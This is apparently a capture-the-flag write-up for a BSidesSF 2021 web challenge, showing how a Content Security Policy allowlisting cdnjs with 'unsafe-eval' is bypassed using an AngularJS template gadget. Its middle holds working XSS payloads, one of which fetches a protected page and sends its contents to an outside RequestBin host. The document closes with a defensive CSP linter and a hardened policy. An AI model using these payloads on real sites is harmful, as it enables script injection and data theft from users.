Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2) for the writeup with images.

---

This challenge was similar to the last one: we need to get an XSS payload to run in the admin's browser to obtain the flag.

Checking the CSP this time we have:

```
script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report
```

The weak spot is `script-src`: it allowlists all of cdnjs.cloudflare.com, a CDN that hosts every release of AngularJS among many other libraries. Note that the `'unsafe-inline'` in `default-src` does not help us with scripts, because an explicit `script-src` is present and takes precedence over the fallback, so a plain inline `<script>` is still blocked. If we can load a script from that CDN and get it to execute arbitrary JS for us, we win!

To do this we can load AngularJS from cdnjs and let it evaluate JavaScript for us from a template expression. AngularJS 1.6 and later has no expression sandbox, so a `{{...}}` expression can reach `Function` directly: `$new` is an ordinary method on the scope, so `$new.constructor` is `Function`, and calling the function it builds runs our code outside of Angular. That `Function(...)` call is itself an eval, which this policy permits through `'unsafe-eval'`. Here's a simple example to test:

```html
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('alert(1)')()}}
```

This payload seems to work!

Now we just need to exfiltrate the flag like in the last challenge, using `fetch`. Nothing in the policy stops the second request: `connect-src *` allows `fetch` and XHR to any origin. (The flag is appended to the URL unencoded, which was fine here; wrap it in `encodeURIComponent` if it might contain characters such as `#` or `&`.)

```html
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('fetch("/csp-two-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/1m40bkh1?x=" + t))')()}}
```

Then we get the Flag on RequestBin:

```  
CTF{Can_Still_Pwn}  
```  
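To catch a policy like this before an attacker does, here is a small CSP linter added as an example (it is not code from the challenge or the original writeup). It parses a serialized policy, applies the `default-src` fallback rule, and flags the three things the exploit above depended on: `'unsafe-eval'`, a `script-src` allowlist entry for a CDN that serves AngularJS, and a `connect-src` that permits any origin. The list of gadget-hosting CDNs and the hardened replacement policy are assumptions for illustration, not something the challenge provides.

```javascript
// Added example, not part of the original writeup: a small CSP linter that
// flags the weaknesses the challenge policy relied on. GADGET_HOSTS is an
// assumption (well-known CDNs that serve AngularJS builds); extend it for
// your own environment.
const GADGET_HOSTS = new Set([
  "cdnjs.cloudflare.com",
  "ajax.googleapis.com",
  "code.angularjs.org",
  "cdn.jsdelivr.net",
  "unpkg.com",
]);

// Parse a serialized policy into { directiveName: [sourceExpressions] }.
// Per the CSP spec a repeated directive is ignored, so the first one wins.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// script-src and connect-src fall back to default-src only when absent;
// null means the browser applies no restriction at all.
function effectiveSources(directives, name) {
  if (name in directives) return directives[name];
  if ("default-src" in directives) return directives["default-src"];
  return null;
}

// Host part of a host-source expression; null for keywords ('self',
// 'unsafe-eval', nonces, hashes) and scheme-sources such as https:.
function sourceHost(source) {
  if (source.startsWith("'")) return null;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return null;
  const m = source.match(/^(?:[a-z][a-z0-9+.-]*:\/\/)?([^/:]+)/i);
  return m ? m[1].toLowerCase() : null;
}

// Return an array of { code, detail } findings for a policy string.
function lintCsp(policy) {
  const d = parseCsp(policy);
  const findings = [];
  const push = (code, detail) => findings.push({ code, detail });

  const scriptSrc = effectiveSources(d, "script-src");
  if (scriptSrc === null) {
    push("NO_SCRIPT_SRC", "neither script-src nor default-src is set; any script runs");
  } else {
    const nonceOrHash = scriptSrc.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
    if (scriptSrc.includes("'unsafe-inline'") && !nonceOrHash) {
      push("UNSAFE_INLINE", "inline scripts allowed with no nonce or hash");
    }
    if (scriptSrc.includes("'unsafe-eval'")) {
      push("UNSAFE_EVAL", "eval/Function allowed, so $new.constructor(...)() style payloads run");
    }
    // With 'strict-dynamic' the browser ignores host sources, so only check them otherwise.
    if (!scriptSrc.includes("'strict-dynamic'")) {
      for (const s of scriptSrc) {
        const host = sourceHost(s);
        if (host === null) continue;
        if (host === "*" || host.startsWith("*.")) {
          push("WILDCARD_HOST", `script-src allows ${s}`);
        } else if (GADGET_HOSTS.has(host)) {
          // A path in the source expression narrows this, but CSP drops path
          // matching after a redirect, so the host is what counts.
          push("GADGET_HOST", `script-src allowlists ${host}, which serves AngularJS`);
        }
      }
    }
  }

  const connectSrc = effectiveSources(d, "connect-src");
  if (connectSrc === null || connectSrc.includes("*")) {
    push("CONNECT_ANY", "fetch/XHR may reach any origin, so exfiltration is unrestricted");
  }
  return findings;
}

// The challenge policy (from the writeup) beside a nonce-based replacement
// (an assumption about what the fix would look like; the nonce must be
// freshly generated per response in practice).
const CHALLENGE_CSP =
  "script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report";
const HARDENED_CSP =
  "script-src 'nonce-R4nd0mPerResponse' 'strict-dynamic'; object-src 'none'; base-uri 'none'; default-src 'self'; connect-src 'self'; report-uri /csp_report";

for (const [label, policy] of [["challenge", CHALLENGE_CSP], ["hardened", HARDENED_CSP]]) {
  const findings = lintCsp(policy);
  console.log(`${label}: ${findings.length} finding(s)`);
  for (const f of findings) console.log(`  ${f.code}: ${f.detail}`);
}
```

Run it with `node csp-lint.js`: the challenge policy yields three findings and the nonce-based policy none. A per-response nonce combined with `'strict-dynamic'` sidesteps the whole host-allowlist problem, because the browser then ignores host sources entirely and only trusts scripts carrying the nonce (plus scripts those scripts load).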

Original writeup: https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2